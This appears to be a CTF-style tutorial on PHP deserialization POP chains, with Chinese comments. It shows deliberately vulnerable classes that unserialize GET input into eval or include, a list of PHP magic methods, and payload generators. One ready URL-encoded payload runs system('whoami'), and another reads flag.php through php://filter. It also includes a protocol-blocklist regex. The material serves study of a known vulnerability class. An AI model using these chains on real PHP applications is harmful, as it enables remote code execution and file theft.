<?phpshow_source(__FILE__);class Lemon {    protected $a;    function __construct() {        $this->a = new H3();    }    function __destruct() {        $this->a->action();    }}class H3 {    function action() {        echo "I want to play basketball!";    }}class Hack {    private $data;    function H3() {        eval($this->data);    }}unserialize($_GET['eval']);

__destruct()：//析构函数当对象被销毁时会被自动调用__wakeup(): //unserialize()时会被自动调用__invoke(): //当尝试以调用函数的方法调用一个对象时，会被自动调用__call(): //在对象上下文中调用不可访问的方法时触发__callStatci(): //在静态上下文中调用不可访问的方法时触发__get(): //用于从不可访问的属性读取数据__set(): //用于将数据写入不可访问的属性__isset(): //在不可访问的属性上调用isset()或empty()触发__unset(): //在不可访问的属性上使用unset()时触发__toString(): //把类当作字符串使用时触发__construct(): //构造函数，当对象new的时候会自动调用，但在unserialize()时不会自动调用__sleep(): //serialize()函数会检查类中是否存在一个魔术方法__sleep() 如果存在，该方法会被优先调用

class Lemon {    protected $a;    function __construct() {        $this->a = new H3();    }    function __destruct() {        $this->a->action();    }}

class Hack {    private $data;    function action() {        eval($this->data);    }}

<?phpclass Lemon {    protected $a;    function __construct() {        $this->a = new Hack();    }}class Hack {    private $data="system('whoami');";}$a=new Lemon();echo urlencode(serialize($a));?>

O%3A5%3A%22Lemon%22%3A1%3A%7Bs%3A4%3A%22%00%2A%00a%22%3BO%3A4%3A%22Hack%22%3A1%3A%7Bs%3A10%3A%22%00Hack%00data%22%3Bs%3A17%3A%22system%28%27whoami%27%29%3B%22%3B%7D%7D

<?phpclass Modifier {    protected  $var;    public function append($value){        include($value);    }    public function __invoke(){ //当脚本尝试将对象调用为函数时触发        $this->append($this->var);    }} class Show{    public $source;    public $str;    public function __construct($file='index.php'){ // 当一个对象创建时被调用        $this->source = $file;        echo 'Welcome to '.$this->source."<br>";    }    public function __toString(){ //当一个对象被当作一个字符串被调用        return $this->str->source;    }     public function __wakeup(){ //使用unserialize时触发        if(preg_match("/gopher|http|file|ftp|https|dict|\.\./i", $this->source)) {            echo "hacker";            $this->source = "index.php";        }    }} class Test{    public $p;    public function __construct(){ // 当一个对象创建时被调用        $this->p = array();    }     public function __get($key){ //用于从不可访问的属性读取数据        $function = $this->p;        return $function();    }} if(isset($_GET['pop'])){    @unserialize($_GET['pop']);}else{    $a=new Show;    highlight_file(__FILE__);} ?>

class Modifier {    protected  $var;    public function append($value){        include($value);    }    public function __invoke(){ //当脚本尝试将对象调用为函数时触发        $this->append($this->var);    }}

class Show{    public $source;    public $str;    public function __construct($file='index.php'){ // 当一个对象创建时被调用        $this->source = $file;        echo 'Welcome to '.$this->source."<br>";    }    public function __toString(){ //当一个对象被当作一个字符串被调用        return $this->str->source;    }     public function __wakeup(){ //使用unserialize时触发        if(preg_match("/gopher|http|file|ftp|https|dict|\.\./i", $this->source)) {            echo "hacker";            $this->source = "index.php";        }    }}

public function __wakeup(){ //使用unserialize时触发    if(preg_match("/gopher|http|file|ftp|https|dict|\.\./i", $this->source)) {        echo "hacker";        $this->source = "index.php";    }}

public function __toString(){ //当一个对象被当作一个字符串被调用    return $this->str->source;}

public function __get($key){ //用于从不可访问的属性读取数据    $function = $this->p;    return $function();}

<?phpclass Modifier {    protected  $var;    public function append($value){        include($value);    }    public function __invoke(){ //当脚本尝试将对象调用为函数时触发        $this->append($this->var);    }}

<?phpclass Modifier {    protected  $var = "php://filter/convert.base64-encode/resource=flag.php";}class Show{    public $source;    public $str;    public function __construct($file){        $this->source = $file;    }    public function __toString(){        return "H3";    }}class Test{    public $p;    public function __construct(){        $this->p = new Modifier();    }}$a = new Show(' ');$a->str= new Test();$h3 = new Show($a);echo urlencode(serialize($h3));